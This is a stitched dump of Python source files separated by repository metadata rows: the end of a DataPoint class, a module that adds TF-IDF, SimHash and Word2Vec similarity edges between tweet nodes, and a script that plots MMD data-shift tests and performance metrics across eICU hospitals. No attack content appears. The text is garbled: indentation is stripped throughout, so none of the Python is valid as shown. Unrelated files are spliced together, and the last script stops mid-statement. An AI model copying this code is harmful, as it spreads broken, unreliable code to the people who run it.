# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from datetime import datetime
from typing import Any
def __str__(self):
return 'DataPoint(' + ', '.join(
map(str, [self._start_time, self._end_time, self._offset, self._sample])) + ')\n'
def __repr__(self):
return 'DataPoint(' + ', '.join(
map(str, [self._start_time, self._end_time, self._offset, self._sample])) + ')\n'
def __lt__(self, dp):
# if hasattr(dp, 'getKey'):
return self.getKey().__lt__(dp.getKey())
def __eq__(self, dp):
return self._start_time == dp.start_time
def __hash__(self):
return hash(('start_time', self.start_time))
| 33.019231 | 106 | 0.674432 |
3c5554bd05cd5239ce11e4e4dd8fa2e50df67f34 | 7,444 | py | Python | code/reveal_links.py | antonia42/DeLi | f07dc79a98eebccbcdcb4ee74eb4570190e6f441 | [
"MIT"
] | 1 | 2021-05-20T20:53:19.000Z | 2021-05-20T20:53:19.000Z | code/reveal_links.py | antonia42/DeLi | f07dc79a98eebccbcdcb4ee74eb4570190e6f441 | [
"MIT"
] | 1 | 2021-04-06T08:34:05.000Z | 2021-11-24T10:47:27.000Z | code/reveal_links.py | antonia42/DeLi | f07dc79a98eebccbcdcb4ee74eb4570190e6f441 | [
"MIT"
] | null | null | null | import sys
import networkx as nx
#from simhash import Simhash, SimhashIndex
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
# if there is a problem with gensim and Word2Vec, check the python version
# to be 2.7
# print('Hello from {}'.format(sys.version))
# TF-IDF helper function
def reveal_similar_links(G, cids, contents, threshold=0.5):
"""
Function to calculate the TF-IDF vectors for all tweet/contents and then it
calculates the cosine similarity for all pairs. It returns the graph with
edges between the similar tweet-nodes, when the cosine similarity for a
pair of tweet-nodes is above a threshold.
Args:
G (networkx.Graph()): The initialized instance of the networkx Graph()
class.
cids (list): The list with the tweet ids from the tweet-nodes of the
graph.
contents (list): The list with the preprocessed content from the tweet-
nodes. Indexing is the same as in the 'cids' list.
threshold (float): The cosine similarity threshold. If the similarity
of a pair exceed this threshold, an edge is added in the graph
between these nodes.
Returns:
The enriched graph instance (networkx.Graph()), after revealing the
hidden edges between similar tweet-nodes.
"""
try:
tfidf = TfidfVectorizer(norm='l2', max_features=1000)
tf_idf_matrix = tfidf.fit_transform(contents)
tf_idf_matrix.todense()
pairwise_similarity = tf_idf_matrix * tf_idf_matrix.T
cos_matrix = (pairwise_similarity).A
tsize = len(contents)
for i in range(0, tsize):
for j in range(i+1, tsize):
# similarity score is in [-1, 1]
sim_score = cos_matrix[i][j]
if sim_score > threshold:
# reveal hidden edge (between similar tweet-nodes)
G.add_edge(cids[i], cids[j], edgetype='similarTo')
except:
pass
return G
# Add edges between all pairs of similar content nodes based on TFIDF
def reveal_hidden_links_tfidf(G, content_dict, threshold):
"""
Function to reveal hidden similarity edges between tweet-nodes based only
on TF-IDF vectors and a cosine similarity threshold.
Args:
G (networkx.Graph()): The initialized instance of the networkx Graph()
class.
content_dict (dict): The dict with the tweet ids from the tweet-nodes
of the graph and the corresponding preprocessed tweet/content text.
threshold (float): The cosine similarity threshold. If the similarity
of a pair exceed this threshold, an edge is added in the graph
between these nodes.
Returns:
The returning element of the function 'reveal_similar_links', a.k.a. an
enriched graph instance, after revealing the hidden edges between
similar tweet-nodes.
"""
cids = content_dict.keys()
contents = content_dict.values()
return reveal_similar_links(G, cids, contents, threshold)
# Creates w-shingles for SimHash
def get_shingles(sentence, n):
"""
Function to reveal hidden similarity edges between tweet-nodes based on
SimHash, an LSH approximation on TF-IDF vectors and a cosine similarity
threshold.
Args:
sentence (str): The sentence (preprocessed text from a tweet-node),
from which the shingles will be created.
n (int): The size of the shingle. In this case, the size is always set
to be three, and it means that all possible tuples with three
consecutive words will be created.
Returns:
A list with all triples made by consecutive words in a sentence.
"""
s = sentence.lower()
return [s[i:i + n] for i in range(max(len(s) - n + 1, 1))]
# Add edges between all pairs of similar content nodes based on SimHash
def reveal_hidden_links_simhash(G, content_dict, threshold):
"""
Function to reveal hidden similarity edges between tweet-nodes based on
SimHash, an LSH approximation on TF-IDF vectors and a cosine similarity
threshold.
Args:
G (networkx.Graph()): The initialized instance of the networkx Graph()
class.
content_dict (dict): The dict with the tweet ids from the tweet-nodes
of the graph and the corresponding preprocessed tweet/content text.
threshold (float): The cosine similarity threshold. If the similarity
of a pair exceed this threshold, an edge is added in the graph
between these nodes.
Returns:
The returning element of the function 'reveal_similar_links', a.k.a. an
enriched graph instance, after revealing the hidden edges between
similar tweet-nodes.
"""
objs = []
for cid, content in content_dict.items():
objs.append((cid, Simhash(get_shingles(content, 3), f=1)))
index = SimhashIndex(objs, f=1, k=2)
for key in index.bucket:
bucket_item = index.bucket[key]
contents = []
cids = []
for item in bucket_item:
newid = str(item.split(',')[-1])
contents.append(content_dict[newid])
cids.append(newid)
G = reveal_similar_links(G, cids, contents, threshold)
return G
# Add edges between all pairs of similar content nodes based on word2vec
def reveal_hidden_links_w2v(G, content_dict, threshold, model, k=3):
"""
Function to reveal hidden similarity edges between tweet-nodes based on
Word2Vec enriched TF-IDF vectors and a cosine similarity threshold. More
specifically, for each word in a tweet, we add the 'k' most similar words
according to the pre-trained Word2Vec model.
Note: If you need to speed up the code during experimentation, it is better
to calculate the Word2Vec enriched text and cache it.
Args:
G (networkx.Graph()): The initialized instance of the networkx Graph()
class.
content_dict (dict): The dict with the tweet ids from the tweet-nodes
of the graph and the corresponding preprocessed tweet/content text.
threshold (float): The cosine similarity threshold. If the similarity
of a pair exceed this threshold, an edge is added in the graph
between these nodes.
model (gensim.models.KeyedVectors()): The Google's pre-trained
Word2Vec model.
k (int): The number of similar words to add.
Returns:
The returning element of the function 'reveal_similar_links', a.k.a. an
enriched graph instance, after revealing the hidden edges between
similar tweet-nodes.
"""
contents = content_dict.values()
cids = content_dict.keys()
enriched_contents = []
for c in contents:
words = c.split(' ')
enriched_list = []
for w in words:
try:
w2v_sim_list = model.most_similar(w, topn=k)
sim_words = [str(t[0]) for t in w2v_sim_list]
enriched_list.append(' '.join(sim_words) + ' ' + w)
except:
enriched_list.append(w)
pass
if len(enriched_list) > 0:
enriched_contents.append(' '.join(enriched_list))
return reveal_similar_links(G, cids, enriched_contents, threshold)
| 35.113208 | 79 | 0.657308 |
3c556dec90e23792b76acc982f2031b9cf0acc91 | 27,754 | py | Python | generate_hosp_plot.py | ChunaraLab/medshifts | cd8a4ac415e7ef15b6e40a8699b08cd468ea9e4b | [
"MIT"
] | 1 | 2021-11-25T12:26:16.000Z | 2021-11-25T12:26:16.000Z | generate_hosp_plot.py | ChunaraLab/medshifts | cd8a4ac415e7ef15b6e40a8699b08cd468ea9e4b | [
"MIT"
] | null | null | null | generate_hosp_plot.py | ChunaraLab/medshifts | cd8a4ac415e7ef15b6e40a8699b08cd468ea9e4b | [
"MIT"
] | null | null | null | '''
Modifed from code by Stephan Rabanser https://github.com/steverab/failing-loudly
Plot test results across hospitals
Usage:
# region
python generate_hosp_plot.py --datset eicu --path orig --test_type multiv --num_hosp 4 --random_runs 100 --min_samples 5000 --sens_attr race --group --group_type regions --limit_samples
# beds
python generate_hosp_plot.py --datset eicu --path orig --test_type multiv --num_hosp 4 --random_runs 100 --min_samples 10000 --sens_attr race --group --group_type beds --limit_samples
# region, beds
python generate_hosp_plot.py --datset eicu --path orig --test_type multiv --num_hosp 5 --random_runs 100 --min_samples 5000 --sens_attr race --group --group_type regions_beds --limit_samples
# region, beds, teaching
python generate_hosp_plot.py --datset eicu --path orig --test_type multiv --num_hosp 6 --random_runs 100 --min_samples 4000 --sens_attr race --group --group_type regions_beds_teaching --limit_samples
# hospitals
python generate_hosp_plot.py --datset eicu --path orig --test_type multiv --num_hosp 10 --random_runs 100 --min_samples 1631 --sens_attr race --limit_samples
# python generate_hosp_plot.py --datset eicu --path orig --test_type multiv --num_hosp 10 --random_runs 100 --min_samples 2000 --sens_attr race --limit_samples
'''
import argparse
from multiprocessing import Value
import pickle
import numpy as np
import seaborn as sns
import pandas as pd
from scipy import stats
from matplotlib.colors import ListedColormap
from itertools import combinations
seed = 1
np.random.seed(seed)
from shift_detector import *
from shift_locator import *
from shift_applicator import *
from data_utils import *
import os
import sys
from exp_utils import *
from plot_utils import *
# -------------------------------------------------
# CONFIG
# -------------------------------------------------
# make_keras_picklable()
np.set_printoptions(threshold=sys.maxsize)
parser = argparse.ArgumentParser()
parser.add_argument("--datset", type=str, default='eicu')
parser.add_argument("--path", type=str, default='orig')
parser.add_argument("--test_type", type=str, default='multiv')
parser.add_argument("--sens_attr", type=str, default='gender') # gender, race
parser.add_argument("--num_hosp", type=int, default=5)
parser.add_argument("--random_runs", type=int, default=10)
parser.add_argument("--min_samples", type=int, default=1500)
parser.add_argument("--group", action='store_true')
parser.add_argument("--group_type", type=str, default='hosp')
parser.add_argument("--limit_samples", action='store_true') # limit two-sample testing to 5000 samples
args = parser.parse_args()
datset = args.datset # sys.argv[1]
test_type = args.test_type # sys.argv[3]
use_group = args.group
group_type = args.group_type
sens_attr = args.sens_attr
limit_samples = args.limit_samples
HospitalGroups_eicu, HospitalGroupsColnames_eicu = get_groups_colnames(group_type)
# path = './hosp_results_gossis_multiv/'
path = './hosp_results_{}_{}_shuffle/'.format(datset, test_type)
path += '{}_group{}_{}_nh{}_run{}_mins{}_s{}_l{}_{}/'.format(datset, use_group, group_type, args.num_hosp, args.random_runs, args.min_samples, sens_attr, limit_samples, args.path)
if not os.path.exists(path):
os.makedirs(path)
# Define train-test pairs of hospitals
NUM_HOSPITALS_TOP = args.num_hosp # 5 # hospitals with records >= 1000
hosp_pairs = []
# TODO move to data_utils
if datset =='eicu':
if use_group:
HospitalIDs = HospitalGroups_eicu
HospitalIDsColnames = HospitalGroupsColnames_eicu
else: # single hospitals
HospitalIDs = HospitalIDs_eicu
HospitalIDsColnames = HospitalIDs_eicu
FeatureGroups = FeatureGroups_eicu
# Define feature groups
# feature_groups = [['labs','vitals','demo','others','saps2diff']]
# feature_groups = [['labs','labs_blood_gas']]
# feature_groups = [['vitals']]
# feature_groups = [['demo']]
# feature_groups = [['saps2labs','saps2vitals']]
# feature_groups = [['saps2'], ['labs'], ['vitals'], ['demo']]
feature_groups = [['saps2']]
# feature_groups = [['saps2'], ['labs','vitals','demo','others']]
elif datset =='gossis':
HospitalIDs = HospitalIDs_gossis
HospitalIDsColnames = HospitalIDs_gossis
FeatureGroups = FeatureGroups_gossis
# Define feature groups
feature_groups = [['APACHE_covariate']]
# feature_groups = [['demographic'], ['vitals'], ['labs','labs_blood_gas'],['APACHE_covariate']]
# feature_groups = [['APACHE_covariate'], ['labs','labs_blood_gas'], ['vitals'], ['APACHE_comorbidity'],
# ['demographic','vitals','labs','labs_blood_gas','APACHE_comorbidity']]
HospitalIDs = HospitalIDs[:NUM_HOSPITALS_TOP]
HospitalIDsColnames = HospitalIDsColnames[:NUM_HOSPITALS_TOP]
# HospitalIDs = [i for i in HospitalIDs if i not in [413,394,199,345]]
for hi in range(len(HospitalIDs)):
for hj in range(len(HospitalIDs)):
hosp_pairs.append((hi,hj,[HospitalIDs[hi]],[HospitalIDs[hj]]))
# hosp_pairs = [([394],[416])]
print('Use groups', use_group, 'Sensitive attribute', sens_attr, 'Hospital pairs', hosp_pairs)
# Define DR methods
# dr_techniques = [DimensionalityReduction.NoRed.value, DimensionalityReduction.PCA.value, DimensionalityReduction.SRP.value, DimensionalityReduction.UAE.value, DimensionalityReduction.TAE.value, DimensionalityReduction.BBSDs.value, DimensionalityReduction.BBSDh.value]
dr_techniques = [DimensionalityReduction.NoRed.value]
# dr_techniques = [DimensionalityReduction.NoRed.value, DimensionalityReduction.PCA.value]
# dr_techniques = [DimensionalityReduction.NoRed.value, DimensionalityReduction.PCA.value, DimensionalityReduction.SRP.value]
if test_type == 'multiv':
# dr_techniques = [DimensionalityReduction.NoRed.value, DimensionalityReduction.PCA.value, DimensionalityReduction.SRP.value, DimensionalityReduction.UAE.value, DimensionalityReduction.TAE.value, DimensionalityReduction.BBSDs.value]
dr_techniques = [DimensionalityReduction.NoRed.value]
# dr_techniques = [DimensionalityReduction.NoRed.value, DimensionalityReduction.PCA.value]
# dr_techniques = [DimensionalityReduction.NoRed.value, DimensionalityReduction.PCA.value, DimensionalityReduction.SRP.value]
if test_type == 'univ':
dr_techniques_plot = dr_techniques.copy()
# dr_techniques_plot.append(DimensionalityReduction.Classif.value)
else:
dr_techniques_plot = dr_techniques.copy()
# Define test types and general test sample sizes
test_types = [td.value for td in TestDimensionality]
if test_type == 'multiv':
od_tests = []
md_tests = [MultidimensionalTest.MMD.value]
# samples = [10, 20, 50, 100, 200, 500, 1000]
# samples = [100, 1000]
samples = [args.min_samples]
# samples = [2500]
# samples = [1000, 1500]
# samples = [10, 20, 50, 100, 200]
else:
# od_tests = [od.value for od in OnedimensionalTest]
od_tests = [OnedimensionalTest.KS.value]
md_tests = []
# samples = [10, 20, 50, 100, 200, 500, 1000, 9000]
# samples = [100, 1000]
samples = [args.min_samples]
# samples = [2500]
# samples = [1000, 1500]
# samples = [10, 20, 50, 100, 200, 500]
difference_samples = 10
# Number of random runs to average results over
random_runs = args.random_runs # 5
# Signifiance level
sign_level = 0.05
# sign_level = 0.01
# Define shift types
# if args.path == 'orig': # sys.argv[2]
# shifts = ['orig']
# brightness = [0.75]
# # shifts = ['rand', 'orig']
# # brightness = [1.25, 0.75]
# else:
# shifts = []
shifts = ['orig']
# -------------------------------------------------
# PIPELINE START
# -------------------------------------------------
sns.set_style("ticks")
cmap = sns.color_palette("rocket_r", as_cmap=True)
# cmap = sns.color_palette("vlag", as_cmap=True)
# cmap = sns.cubehelix_palette(2, hue=0.05, rot=0, light=0.9, dark=0, as_cmap=True)
# Discrete colormap using code by lanery https://stackoverflow.com/questions/38836154/discrete-legend-in-seaborn-heatmap-plot
cmap_binary = sns.cubehelix_palette(2, hue=0.05, rot=0, light=0.9, dark=0)
NUM_METRICS = 36
samples_shifts_rands_dr_tech_feats_hosps = np.ones((len(samples), len(shifts), random_runs, len(dr_techniques_plot), len(feature_groups), len(hosp_pairs))) * (-1)
samples_shifts_rands_dr_tech_feats_hosps_t_val = np.ones((len(samples), len(shifts), random_runs, len(dr_techniques_plot), len(feature_groups), len(hosp_pairs))) * (-1)
samples_shifts_rands_feats_hosps_te_acc = np.ones((len(samples), len(shifts), random_runs, len(feature_groups), len(hosp_pairs), NUM_METRICS)) * (-1) # 0-auc, 1-smr # TODO add auc, smr, p-val, mmd in same array. add hosp_pair
samples_shifts_rands_feats_hosp_pairs_te_acc = np.ones((len(samples), len(shifts), random_runs, len(feature_groups), len(HospitalIDs), len(HospitalIDs), NUM_METRICS)) * (-1) # 0-auc, 1-smr # TODO add auc, smr, p-val, mmd in same array. add hosp_pair
for feature_group_idx, feature_group in enumerate(feature_groups):
target = FeatureGroups['outcome']
feature_set = []
for group in feature_group:
feature_set += FeatureGroups[group]
samples_shifts_rands_feat_hosps_p_vals = np.ones((len(samples), len(shifts), len(dr_techniques_plot), len(od_tests), len(feature_set), random_runs, len(hosp_pairs))) * (-1)
samples_shifts_rands_feat_hosps_t_vals = np.ones((len(samples), len(shifts), len(dr_techniques_plot), len(od_tests), len(feature_set), random_runs, len(hosp_pairs))) * (-1)
for hosp_pair_idx, (hosp_train_idx, hosp_test_idx, hosp_train, hosp_test) in enumerate(hosp_pairs):
print("\n==========\nFeature Set, Hosp Train, Hosp Test", feature_group, hosp_train, hosp_test)
print("==========\n")
feats_path = path + "_".join(feature_group) + '/'
hosp_folder_name = 'tr_' + '_'.join(map(str, hosp_train)) + '_ts_' + '_'.join(map(str, hosp_test))
hosp_path = feats_path + hosp_folder_name + '/'
samples_shifts_rands_dr_tech = np.load("%s/samples_shifts_rands_dr_tech.npy" % (hosp_path))
samples_shifts_rands_dr_tech_t_val = np.load("%s/samples_shifts_rands_dr_tech_t_val.npy" % (hosp_path))
with open("%s/samples_shifts_rands_metrics.pkl" % (hosp_path), 'rb') as fr:
metric_results = pickle.load(fr)
# print("sadf", "%s/samples_shifts_rands_metrics.pkl" % (hosp_path))
# print(metric_results.results_train[0,0,0])
samples_shifts_rands_te_acc, metric_names = get_metrics_array(metric_results)
samples_shifts_rands_dr_tech_feats_hosps[:,:,:,:,feature_group_idx,hosp_pair_idx] = samples_shifts_rands_dr_tech
samples_shifts_rands_dr_tech_feats_hosps_t_val[:,:,:,:,feature_group_idx,hosp_pair_idx] = samples_shifts_rands_dr_tech_t_val
samples_shifts_rands_feats_hosps_te_acc[:,:,:,feature_group_idx,hosp_pair_idx,:] = samples_shifts_rands_te_acc
samples_shifts_rands_feats_hosp_pairs_te_acc[:,:,:,feature_group_idx,hosp_train_idx,hosp_test_idx,:] = samples_shifts_rands_te_acc
if test_type == 'univ':
samples_shifts_rands_feat_p_vals = np.load("%s/samples_shifts_rands_feat_p_vals.npy" % (hosp_path))
samples_shifts_rands_feat_t_vals = np.load("%s/samples_shifts_rands_feat_t_vals.npy" % (hosp_path))
samples_shifts_rands_feat_hosps_p_vals[:,:,:,:,:,:,hosp_pair_idx] = samples_shifts_rands_feat_p_vals
samples_shifts_rands_feat_hosps_t_vals[:,:,:,:,:,:,hosp_pair_idx] = samples_shifts_rands_feat_t_vals
np.save("%s/samples_shifts_rands_feat_hosps_p_vals.npy" % (feats_path), samples_shifts_rands_feat_hosps_p_vals)
np.save("%s/samples_shifts_rands_feat_hosps_t_vals.npy" % (feats_path), samples_shifts_rands_feat_hosps_t_vals)
np.save("%s/samples_shifts_rands_dr_tech_feats_hosps.npy" % (path), samples_shifts_rands_dr_tech_feats_hosps)
np.save("%s/samples_shifts_rands_dr_tech_feats_hosps_t_val.npy" % (path), samples_shifts_rands_dr_tech_feats_hosps_t_val)
np.save("%s/samples_shifts_rands_feats_hosps_te_acc.npy" % (path), samples_shifts_rands_feats_hosps_te_acc)
np.save("%s/samples_shifts_rands_feats_hosp_pairs_te_acc.npy" % (path), samples_shifts_rands_feats_hosp_pairs_te_acc)
# Feat, dr, shift, sample - mean
for feature_group_idx, feature_group in enumerate(feature_groups):
print("==========\nPlotting", feature_group)
print("==========")
target = FeatureGroups['outcome']
feature_set = []
for group in feature_group:
feature_set += FeatureGroups[group]
feats_path = path + "_".join(feature_group) + '/'
if test_type == 'univ':
samples_shifts_rands_feat_hosps_p_vals = np.load("%s/samples_shifts_rands_feat_hosps_p_vals.npy" % (feats_path))
samples_shifts_rands_feat_hosps_t_vals = np.load("%s/samples_shifts_rands_feat_hosps_t_vals.npy" % (feats_path))
for dr_idx, dr in enumerate(dr_techniques_plot):
for shift_idx, shift in enumerate(shifts):
for si, sample in enumerate(samples):
hosp_pair_pval = np.ones((len(HospitalIDs), len(HospitalIDs))) * (-1)
hosp_pair_tval = np.ones((len(HospitalIDs), len(HospitalIDs))) * (-1)
if test_type == 'univ':
# hosp_pair_feat_pval = np.ones((len(hosp_pairs), len(feature_set), random_runs))
hosp_pair_feat_pval = np.ones((len(hosp_pairs), len(feature_set)))
hosp_pair_feat_tval = np.ones((len(hosp_pairs), len(feature_set)))
for hosp_pair_idx, (hosp_train_idx, hosp_test_idx, hosp_train, hosp_test) in enumerate(hosp_pairs):
feats_dr_tech_shifts_samples_results = samples_shifts_rands_dr_tech_feats_hosps[si,shift_idx,:,dr_idx,feature_group_idx,hosp_pair_idx]
feats_dr_tech_shifts_samples_results_t_val = samples_shifts_rands_dr_tech_feats_hosps_t_val[si,shift_idx,:,dr_idx,feature_group_idx,hosp_pair_idx]
mean_p_vals = np.mean(feats_dr_tech_shifts_samples_results)
std_p_vals = np.std(feats_dr_tech_shifts_samples_results)
mean_t_vals = np.mean(feats_dr_tech_shifts_samples_results_t_val)
hosp_pair_pval[hosp_train_idx, hosp_test_idx] = mean_p_vals < sign_level
hosp_pair_tval[hosp_train_idx, hosp_test_idx] = mean_t_vals
# adjust_sign_level = sign_level / len(hosp_pairs)
adjust_sign_level = sign_level
if test_type == 'univ':
dr_tech_shifts_samples_results_feat_p_val = samples_shifts_rands_feat_hosps_p_vals[si,shift_idx,dr_idx,0,:,:,hosp_pair_idx] # TODO iterate for od_tests
dr_tech_shifts_samples_results_feat_t_val = samples_shifts_rands_feat_hosps_t_vals[si,shift_idx,dr_idx,0,:,:,hosp_pair_idx] # TODO iterate for od_tests
mean_feat_p_vals = np.mean(dr_tech_shifts_samples_results_feat_p_val, axis=1)
mean_feat_t_vals = np.mean(dr_tech_shifts_samples_results_feat_t_val, axis=1)
# hosp_pair_feat_pval[hosp_pair_idx, :, :] = dr_tech_shifts_samples_results_feat_p_val
hosp_pair_feat_pval[hosp_pair_idx, :] = mean_feat_p_vals < adjust_sign_level
hosp_pair_feat_tval[hosp_pair_idx, :] = mean_feat_t_vals
# p-value MMD test
hosp_avg_pval = hosp_pair_pval.mean(axis=1)
hosp_pair_pval_triu = np.triu(np.ones_like(hosp_pair_pval, dtype=np.bool))
np.fill_diagonal(hosp_pair_pval_triu, False)
hosp_pair_pval = pd.DataFrame(hosp_pair_pval, columns=HospitalIDsColnames, index=HospitalIDsColnames)
hosp_pair_pval.to_csv("%s/%s_%s_%s_%s_p_val_df.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), index=True)
# cmap_binary = sns.cubehelix_palette(2, hue=0.05, rot=0, light=0.9, dark=0)
# fig = sns.heatmap(hosp_pair_pval, linewidths=0.5, cmap=ListedColormap(cmap_binary))
fig = sns.heatmap(hosp_pair_pval, mask=hosp_pair_pval_triu, linewidths=0.5, cmap=ListedColormap(cmap_binary))
colorbar = fig.collections[0].colorbar
colorbar.set_ticks([0.25, 0.75])
colorbar.set_ticklabels(['No Data Shift', 'Data Shift'])
label_text = 'Hospital ID'
if use_group and group_type=='regions':
label_text = 'Region'
elif use_group and group_type=='beds':
label_text = 'Numbedscategory'
plt.xlabel(label_text) # Target
plt.ylabel(label_text) # Source
if not use_group:
plt.xticks(rotation=30)
plt.savefig("%s/%s_%s_%s_%s_p_val_hmp.pdf" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), bbox_inches='tight')
plt.clf()
# cmap = sns.cubehelix_palette(2, hue=0.05, rot=0, light=0.9, dark=0, as_cmap=True)
if test_type == 'univ':
# hosp_pair_feat_pval = hosp_pair_feat_pval.min(axis=0) # Bonferroni correction by taking min across hospital pairs
# hosp_pair_feat_avg_pval = hosp_pair_feat_pval.mean(axis=1) < adjust_sign_level # mean across random runs
hosp_pair_feat_avg_pval = hosp_pair_feat_pval.mean(axis=0)
feature_set_escaped = [i.replace('_', '\_') for i in feature_set]
hosp_pair_feat_avg_pval = pd.DataFrame(hosp_pair_feat_avg_pval, index=feature_set_escaped)
hosp_pair_feat_avg_pval.columns=["Features"]
hosp_pair_feat_avg_pval.to_csv("%s/%s_%s_%s_%s_feat_avg_pval_df.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), index=True)
plt.figure(figsize=(8, 6))
fig = sns.heatmap(hosp_pair_feat_avg_pval, linewidths=0.5, cmap=cmap, square=True)
plt.savefig("%s/%s_%s_%s_%s_feat_avg_pval_hmp.pdf" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), bbox_inches='tight')
plt.clf()
hosp_pair_feat_avg_tval = hosp_pair_feat_tval.mean(axis=0)
hosp_pair_feat_avg_tval = pd.DataFrame(hosp_pair_feat_avg_tval, index=feature_set_escaped)
hosp_pair_feat_avg_tval.columns=["Features"]
hosp_pair_feat_avg_tval.to_csv("%s/%s_%s_%s_%s_feat_avg_tval_df.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), index=True)
plt.figure(figsize=(8, 6))
fig = sns.heatmap(hosp_pair_feat_avg_tval, linewidths=0.5, cmap=cmap, square=True)
plt.savefig("%s/%s_%s_%s_%s_feat_avg_tval_hmp.pdf" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), bbox_inches='tight')
plt.clf()
# Minimum of the pairwise average tval in subsets of 5 hospitals
MAX_NUM_SUBSET = 5
HospitalIDs_ = np.array(HospitalIDsColnames)
for num_subset in range(1, MAX_NUM_SUBSET+1):
avg_tval_subset = []
for subs in combinations(range(len(HospitalIDs_)), num_subset):
avg_tval_subset.append((subs, hosp_pair_tval[np.ix_(subs,subs)].mean()))
avg_tval_subset_sorted = sorted(avg_tval_subset, key=lambda x: x[1])
avg_tval_subset_sorted = [(HospitalIDs_[np.array(subs)],mmd) for subs,mmd in avg_tval_subset_sorted]
avg_tval_subset_sorted = pd.DataFrame(avg_tval_subset_sorted, columns=['HospitalIDs','average_MMD'])
avg_tval_subset_sorted.to_csv("%s/%s_%s_%s_%s_%s_t_val_min_subset.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample, num_subset), index=False)
# MMD statistic value
hosp_avg_tval = hosp_pair_tval.mean(axis=1)
hosp_pair_tval_triu = np.triu(np.ones_like(hosp_pair_tval, dtype=np.bool))
np.fill_diagonal(hosp_pair_tval_triu, False)
hosp_pair_tval = pd.DataFrame(hosp_pair_tval, columns=HospitalIDsColnames, index=HospitalIDsColnames)
hosp_pair_tval.to_csv("%s/%s_%s_%s_%s_t_val_df.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), index=True)
# cmap = sns.cubehelix_palette(50, hue=0.05, rot=0, light=0.9, dark=0, as_cmap=True)
# fig = sns.heatmap(hosp_pair_tval, linewidths=0.5, cmap=cmap)
fig = sns.heatmap(hosp_pair_tval, mask=hosp_pair_tval_triu, linewidths=0.5, cmap=cmap)
label_text = 'Hospital ID'
if use_group and group_type=='regions':
label_text = 'Region'
elif use_group and group_type=='beds':
label_text = 'Numbedscategory'
plt.xlabel(label_text) # Target
plt.ylabel(label_text) # Source
if not use_group:
plt.xticks(rotation=30)
plt.savefig("%s/%s_%s_%s_%s_t_val_hmp.pdf" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample), bbox_inches='tight')
plt.clf()
hosp_all_pairs_tval = pd.melt(hosp_pair_tval.reset_index(), id_vars='index')
hosp_all_pairs_tval.columns = ['Source','Target','MMD']
if dr == DimensionalityReduction.NoRed.value: # TODO run auc smr plots only once in dr_techniques_plot
h_stats_all = hosp_all_pairs_tval
for metric_idx in range(NUM_METRICS):
if metric_names[metric_idx] in ['csdiff', 'cs', 'fnrsign', 'csdispsign', 'aucdispsign']:
cmap = sns.color_palette("vlag", as_cmap=True)
elif metric_names[metric_idx] in ['aucdiff', 'auc']:
cmap = sns.color_palette("rocket", as_cmap=True)
else:
cmap = sns.color_palette("rocket_r", as_cmap=True)
metric_name = metric_names[metric_idx].replace('_', '\_')
feats_shifts_samples_metric = samples_shifts_rands_feats_hosp_pairs_te_acc[si,shift_idx,:,feature_group_idx,:,:,metric_idx]
mean_te_metric = np.mean(feats_shifts_samples_metric, axis=0)
std_te_metric = np.std(feats_shifts_samples_metric, axis=0)
# hosp_avg_metric = mean_te_metric.mean(axis=1)
# hosp_min_metric = mean_te_metric.min(axis=1)
hosp_pair_metric = pd.DataFrame(mean_te_metric, columns=HospitalIDsColnames, index=HospitalIDsColnames)
hosp_pair_metric.to_csv("%s/%s_%s_%s_%s_%s_df.csv" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample, metric_name), index=True)
# cmap = sns.cubehelix_palette(50, hue=0.05, rot=0, light=0.9, dark=0, as_cmap=True)
center, vmin, vmax = None, None, None
if not use_group:
if metric_names[metric_idx] in ['csdisp', 'aucdisp', 'fnr']:
center, vmin, vmax = None, None, np.nanpercentile(mean_te_metric,97.5)
elif metric_names[metric_idx] in ['csdispsign', 'aucdispsign', 'fnrsign', 'fnrmin', 'fnrmaj']:
center, vmin, vmax = 0, np.nanpercentile(mean_te_metric,2.5), np.nanpercentile(mean_te_metric,97.5)
elif metric_names[metric_idx] in ['csmin', 'csmaj']:
center, vmin, vmax = 1, np.nanpercentile(mean_te_metric,2.5), np.nanpercentile(mean_te_metric,97.5)
fig = sns.heatmap(hosp_pair_metric, linewidths=0.5, cmap=cmap, center=center, vmin=vmin, vmax=vmax)
xlabel_text = 'Test Hospital ID'
ylabel_text = 'Train Hospital ID'
if use_group and group_type=='regions':
xlabel_text = 'Test Region'
ylabel_text = 'Train Region'
elif use_group and group_type in ['beds', 'regions_beds', 'regions_beds_teaching']:
xlabel_text = 'Test Category'
ylabel_text = 'Train Category'
plt.xlabel(xlabel_text)
plt.ylabel(ylabel_text)
if not use_group:
plt.xticks(rotation=30)
plt.savefig("%s/%s_%s_%s_%s_%s_hmp.pdf" % (feats_path, "_".join(feature_group), DimensionalityReduction(dr).name, shift, sample, metric_name), bbox_inches='tight')
plt.clf()
hosp_all_pairs_metric = pd.melt(hosp_pair_metric.reset_index(), id_vars='index')
hosp_all_pairs_metric.columns = ['Source','Target',metric_name]
h_stats_all = h_stats_all.merge(hosp_all_pairs_metric, how='left',
left_on=['Source','Target'], right_on = ['Source','Target'])
# plot only across hospital results
h_stats_all = h_stats_all[h_stats_all.Source!=h_stats_all.Target]
for metric_idx in range(NUM_METRICS):
metric_name = metric_names[metric_idx].replace('_', '\_')
fig = sns.regplot(data=h_stats_all, x='MMD', y=metric_name, scatter_kws={"s": 80, 'alpha':0.6}, truncate=False)
try:
corr_coef, pval_corr_coef = stats.pearsonr(h_stats_all['MMD'], h_stats_all[metric_name])
except ValueError as err:
print(feature_group, metric_name)
print(err)
corr_coef = 0.0
pval_corr_coef = 1.0
textstr = '\n'.join((
